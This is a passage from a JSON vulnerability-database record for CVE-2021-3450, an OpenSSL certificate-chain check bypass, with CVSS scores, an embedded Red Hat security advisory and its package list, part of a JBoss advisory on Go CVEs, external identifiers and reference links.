"CVE-2021-3450", "impactScore": 5.2, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-3450", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-202103-1456", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-388430", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-388430" }, { "db": "CNNVD", "id": "CNNVD-202103-1456" }, { "db": "NVD", "id": "CVE-2021-3450" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a \"purpose\" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named \"purpose\" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. 
In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j). OpenSSL is an open source general encryption library of the Openssl team that can implement the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLSv1) protocols. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat Virtualization security, bug fix, and enhancement update\nAdvisory ID: RHSA-2021:1189-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1189\nIssue date: 2021-04-14\nCVE Names: CVE-2021-3449 CVE-2021-3450 \n=====================================================================\n\n1. Summary:\n\nAn update is now available for Red Hat Virtualization 4 for Red Hat\nEnterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64\nRed Hat Virtualization 4 Hypervisor for RHEL 8 - noarch, x86_64\n\n3. Description:\n\nThe redhat-virtualization-host packages provide the Red Hat Virtualization\nHost. 
These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are\ninstalled using a special build of Red Hat Enterprise Linux with only the\npackages required to host virtual machines. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe ovirt-node-ng packages provide the Red Hat Virtualization Host. These\npackages include redhat-release-virtualization-host, ovirt-node, and\nrhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a\nspecial build of Red Hat Enterprise Linux with only the packages required\nto host virtual machines. RHVH features a Cockpit user interface for\nmonitoring the host\u0027s resources and performing administrative tasks. \n\nChanges to the redhat-release-virtualization-host component:\n\n* Previously, the redhat-support-tool was missing from the RHV-H 4.4\npackage. \nIn this release, the redhat-support-tool has been added. (BZ#1928607)\n\nSecurity Fix(es):\n\n* openssl: NULL pointer dereference in signature_algorithms processing\n(CVE-2021-3449)\n\n* openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT\n(CVE-2021-3450)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\nThe system must be rebooted for this update to take effect. For the update\nto take effect, all services linked to the glibc library must be restarted,\nor the system rebooted. \n\n5. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1892573 - RHVH 4.4.2 fails to boot from SAN when using UUID for /boot partition\n1895832 - RHVH 4.4.3: No response when clicking button \"Help\" in Anaconda GUI\n1907306 - \"sysstat\" doesn\u0027t collect data for upgraded RHVH\n1907358 - In FIPS mode, RHVH cannot enter the new layer after upgrade\n1907746 - RHVH cannot enter the new layer after upgrade testing with STIG profile selected. \n1918207 - RHVH upgrade to 4.4.5-1 will fail due to FileNotFoundError\n1927395 - RHVH, protecting key packages from being removed. \n1928607 - redhat-support-tool is missing from latest RHV-H 4.4\n1940845 - Include updated gluster-ansible-features in RHV-H 4.4.5\n1941547 - CVE-2021-3450 openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT\n1941554 - CVE-2021-3449 openssl: NULL pointer dereference in signature_algorithms processing\n1942040 - Rebase RHV-H 4.4.5 on RHEL-AV 8.3.1 Async\n1942498 - Rebase RHV-H 4.4.5 on RHEL-8.3.1.3\n\n6. Package List:\n\nRed Hat Virtualization 4 Hypervisor for RHEL 
8:\n\nSource:\nboost-1.66.0-10.el8.src.rpm\ndyninst-10.1.0-4.el8.src.rpm\ngcc-8.3.1-5.1.el8.src.rpm\nisl-0.16.1-6.el8.src.rpm\nlibmpc-1.0.2-9.el8.src.rpm\nlibxcrypt-4.1.1-4.el8.src.rpm\nmake-4.2.1-10.el8.src.rpm\nredhat-virtualization-host-4.4.5-20210330.0.el8_3.src.rpm\ntbb-2018.2-9.el8.src.rpm\nzip-3.0-23.el8.src.rpm\n\nnoarch:\nredhat-virtualization-host-image-update-4.4.5-20210330.0.el8_3.noarch.rpm\nvim-filesystem-8.0.1763-15.el8.noarch.rpm\n\nx86_64:\nboost-atomic-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-chrono-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-container-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-context-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-coroutine-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-date-time-1.66.0-10.el8.x86_64.rpm\nboost-date-time-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-debugsource-1.66.0-10.el8.x86_64.rpm\nboost-doctools-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-fiber-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-filesystem-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-graph-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-graph-mpich-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-graph-openmpi-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-iostreams-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-locale-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-log-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-math-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-mpich-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-mpich-python3-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-numpy3-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-openmpi-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-openmpi-python3-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-program-options-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-python3-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-random-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-regex-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-serialization-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-signals-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-stacktrace-debuginfo-1.6
6.0-10.el8.x86_64.rpm\nboost-system-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-test-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-thread-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-timer-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-type_erasure-debuginfo-1.66.0-10.el8.x86_64.rpm\nboost-wave-debuginfo-1.66.0-10.el8.x86_64.rpm\nbpftool-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\ncompat-libmpc-debuginfo-1.0.2-9.el8.x86_64.rpm\ncpp-8.3.1-5.1.el8.x86_64.rpm\ncpp-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ndyninst-10.1.0-4.el8.x86_64.rpm\ndyninst-debuginfo-10.1.0-4.el8.x86_64.rpm\ndyninst-debugsource-10.1.0-4.el8.x86_64.rpm\ndyninst-devel-debuginfo-10.1.0-4.el8.x86_64.rpm\ndyninst-testsuite-debuginfo-10.1.0-4.el8.x86_64.rpm\ngcc-8.3.1-5.1.el8.x86_64.rpm\ngcc-c++-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-debugsource-8.3.1-5.1.el8.x86_64.rpm\ngcc-gdb-plugin-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-gfortran-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-offload-nvptx-debuginfo-8.3.1-5.1.el8.x86_64.rpm\ngcc-plugin-devel-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nglibc-debuginfo-2.28-127.el8_3.2.x86_64.rpm\nglibc-debuginfo-common-2.28-127.el8_3.2.x86_64.rpm\nglibc-devel-2.28-127.el8_3.2.x86_64.rpm\nglibc-headers-2.28-127.el8_3.2.x86_64.rpm\nisl-0.16.1-6.el8.x86_64.rpm\nisl-debugsource-0.16.1-6.el8.x86_64.rpm\nkernel-debug-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-debuginfo-common-x86_64-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-devel-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-headers-4.18.0-240.22.1.el8_3.x86_64.rpm\nkernel-tools-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\nlibasan-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibatomic-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibgcc-8.3.1-5.1.el8.x86_64.rpm\nlibgcc-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibgfortran-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibgomp-8.3.1-5.1.el8.x86_64.rpm\nlibgomp-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibgomp-offload-nvptx-debuginfo-8.3.1-5.1.el8.x86_64.rpm\
nlibitm-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nliblsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibmpc-1.0.2-9.el8.x86_64.rpm\nlibmpc-debuginfo-1.0.2-9.el8.x86_64.rpm\nlibmpc-debugsource-1.0.2-9.el8.x86_64.rpm\nlibquadmath-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibstdc++-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibtsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibubsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm\nlibxcrypt-debugsource-4.1.1-4.el8.x86_64.rpm\nlibxcrypt-devel-4.1.1-4.el8.x86_64.rpm\nmake-4.2.1-10.el8.x86_64.rpm\nmake-debugsource-4.2.1-10.el8.x86_64.rpm\nperf-4.18.0-240.22.1.el8_3.x86_64.rpm\nperf-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\npython3-perf-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm\ntbb-2018.2-9.el8.x86_64.rpm\ntbb-debugsource-2018.2-9.el8.x86_64.rpm\nvim-X11-debuginfo-8.0.1763-15.el8.x86_64.rpm\nvim-common-8.0.1763-15.el8.x86_64.rpm\nvim-common-debuginfo-8.0.1763-15.el8.x86_64.rpm\nvim-debuginfo-8.0.1763-15.el8.x86_64.rpm\nvim-debugsource-8.0.1763-15.el8.x86_64.rpm\nvim-enhanced-8.0.1763-15.el8.x86_64.rpm\nvim-enhanced-debuginfo-8.0.1763-15.el8.x86_64.rpm\nvim-minimal-debuginfo-8.0.1763-15.el8.x86_64.rpm\nzip-3.0-23.el8.x86_64.rpm\nzip-debugsource-3.0-23.el8.x86_64.rpm\n\nRHEL 8-based RHEV-H for RHEV 4 (build requirements):\n\nSource:\nimgbased-1.2.18-0.1.el8ev.src.rpm\nredhat-release-virtualization-host-4.4.5-4.el8ev.src.rpm\nscap-security-guide-0.1.50-1.el8ev.src.rpm\n\nnoarch:\nimgbased-1.2.18-0.1.el8ev.noarch.rpm\npython3-imgbased-1.2.18-0.1.el8ev.noarch.rpm\nredhat-virtualization-host-image-update-placeholder-4.4.5-4.el8ev.noarch.rpm\nscap-security-guide-rhv-0.1.50-1.el8ev.noarch.rpm\n\nx86_64:\nredhat-release-virtualization-host-4.4.5-4.el8ev.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. 
References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-3449\nhttps://access.redhat.com/security/cve/CVE-2021-3450\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nRed Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 7 zip\nrelease for RHEL 7, RHEL 8 and Microsoft Windows is available. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release adds the new Apache HTTP Server 2.4.37 Service Pack 7 packages\nthat are part of the JBoss Core Services offering. 
\n\nThis release serves as a replacement for Red Hat JBoss Core Services Pack\nApache Server 2.4.37 Service Pack 6 and includes bug fixes and\nenhancements. Refer to the Release Notes for information on the most\nsignificant bug fixes and enhancements included in this release. Solution:\n\nBefore applying the update, back up your existing installation, including\nall applications, configuration files, databases and database settings, and\nso on. \n\nThe References section of this erratum contains a download link for the\nupdate. You must be logged in to download the update. \n\nSecurity Fix(es):\n\n* golang: crypto/tls: certificate of wrong type is causing TLS client to\npanic\n(CVE-2021-34558)\n* golang: net: lookup functions may return invalid host names\n(CVE-2021-33195)\n* golang: net/http/httputil: ReverseProxy forwards connection headers if\nfirst one is empty (CVE-2021-33197)\n* golang: math/big.Rat: may cause a panic or an unrecoverable fatal error\nif passed inputs with very large exponents (CVE-2021-33198)\n* golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a\ncustom TokenReader (CVE-2021-27918)\n* golang: net/http: panic in ReadRequest and ReadResponse when reading a\nvery large header (CVE-2021-31525)\n* golang: archive/zip: malformed archive may cause panic or memory\nexhaustion (CVE-2021-33196)\n\nIt was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196\nhave been incorrectly mentioned as fixed in RHSA for Serverless client kn\n1.16.0. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic\n1983651 - Release of OpenShift Serverless Serving 1.17.0\n1983654 - Release of OpenShift Serverless Eventing 1.17.0\n1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names\n1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty\n1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents\n1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196\n\n5", "sources": [ { "db": "NVD", "id": "CVE-2021-3450" }, { "db": "VULHUB", "id": "VHN-388430" }, { "db": "PACKETSTORM", "id": "162694" }, { "db": "PACKETSTORM", "id": "162172" }, { "db": "PACKETSTORM", "id": "162307" }, { "db": "PACKETSTORM", "id": "162197" }, { "db": "PACKETSTORM", "id": "164192" } ], "trust": 1.44 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-3450", "trust": 2.2 }, { "db": "SIEMENS", "id": "SSA-389290", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/03/28/3", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/03/27/2", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/03/28/4", "trust": 1.7 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2021/03/27/1", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2021-05", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2021-09", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2021-08", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA44845", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10356", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "162172", "trust": 0.8 }, 
{ "db": "PACKETSTORM", "id": "162307", "trust": 0.8 }, { "db": "PACKETSTORM", "id": "162337", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "162151", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "162196", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "162383", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "163257", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "162013", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "162041", "trust": 0.7 }, { "db": "PACKETSTORM", "id": "162699", "trust": 0.7 }, { "db": "AUSCERT", "id": "ESB-2021.1406", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.2160", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1191", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.2259.2", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1618", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.3141", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1378", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4083", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1065", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.2228", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1445", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1127", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.2408", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1293", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1727", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1225", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.1025", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.2657", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1082.2", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1075", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.1757", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2021.4058", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021051226", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021050609", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022041940", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021041615", "trust": 0.6 
}, { "db": "CS-HELP", "id": "SB2021101938", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021062703", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021062315", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021042114", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021101261", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021072056", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021071904", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022060315", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021072765", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021042502", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021052216", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2021050615", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022031104", "trust": 0.6 }, { "db": "CS-HELP", "id": "SB2022011038", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "161984", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202103-1456", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "162197", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "162189", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "162201", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "162200", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "162183", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-388430", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "162694", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "164192", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-388430" }, { "db": "PACKETSTORM", "id": "162694" }, { "db": "PACKETSTORM", "id": "162172" }, { "db": "PACKETSTORM", "id": "162307" }, { "db": "PACKETSTORM", "id": "162197" }, { "db": "PACKETSTORM", "id": "164192" }, { "db": "CNNVD", "id": "CNNVD-202103-1456" }, { "db": "NVD", "id": "CVE-2021-3450" } ] }, "id": "VAR-202103-1463", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-388430" } ], "trust": 0.430409355 }, 
"last_update_date": "2024-09-19T21:03:53.297000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "OpenSSL Repair measures for trust management problem vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146028" } ], "sources": [ { "db": "CNNVD", "id": "CNNVD-202103-1456" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-295", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-388430" }, { "db": "NVD", "id": "CVE-2021-3450" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-openssl-2021-ghy28djd" }, { "trust": 2.3, "url": "https://www.oracle.com/security-alerts/cpuapr2021.html" }, { "trust": 2.3, "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "trust": 2.3, "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa44845" }, { "trust": 1.7, "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2021-0013" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20210326-0006/" }, { "trust": 1.7, "url": "https://www.openssl.org/news/secadv/20210325.txt" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2021-05" }, { 
"trust": 1.7, "url": "https://www.tenable.com/security/tns-2021-08" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2021-09" }, { "trust": 1.7, "url": "https://security.gentoo.org/glsa/202103-03" }, { "trust": 1.7, "url": "https://mta.openssl.org/pipermail/openssl-announce/2021-march/000198.html" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-21:07.openssl.asc" }, { "trust": 1.7, "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "trust": 1.7, "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/03/27/1" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/03/27/2" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/03/28/3" }, { "trust": 1.7, "url": "http://www.openwall.com/lists/oss-security/2021/03/28/4" }, { "trust": 1.6, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10356" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b" }, { "trust": 1.0, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ccbfllvqvilivgzmbjl3ixzgkwqisynp/" }, { "trust": 0.7, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b" }, { "trust": 0.7, "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ccbfllvqvilivgzmbjl3ixzgkwqisynp/" }, { "trust": 0.6, "url": "https://www.debian.org/security/2021/dsa-4875" }, { "trust": 0.6, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-are-affected-by-vulnerabilities-in-node-js-cve-2021-3450-cve-2021-3449-3/" 
}, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-update-available-for-openssl-vulnerabilities-affecting-ibm-watson-speech-services-1-2-1/" }, { "trust": 0.6, "url": "https://www.ibm.com/support/pages/node/6486347" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021052216" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-openssl-affect-ibm-integration-bus-and-ibm-app-connect-enterprise-v11-cve-2021-3449-cve-2021-3450-2/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.2657" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1127" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1445" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1727" }, { "trust": 0.6, "url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-3450" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-elastic-storage-system-systems-are-affected-by-vulnerabilities-in-openssl/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1406" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/162172/red-hat-security-advisory-2021-1189-01.html" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-xstream-java-openssl-websphere-application-server-liberty-and-node-js-affect-ibm-spectrum-control/" }, { "trust": 0.6, "url": "https://www.ibm.com/blogs/psirt/security-bulletin-openssl-for-ibm-i-is-affected-by-cve-2021-3449-and-cve-2021-3450/" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1378" }, { "trust": 0.6, "url": "https://packetstormsecurity.com/files/162041/gentoo-linux-security-advisory-202103-03.html" }, { "trust": 0.6, "url": "https://www.oracle.com/security-alerts/cpujul2021.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.1293" }, { "trust": 
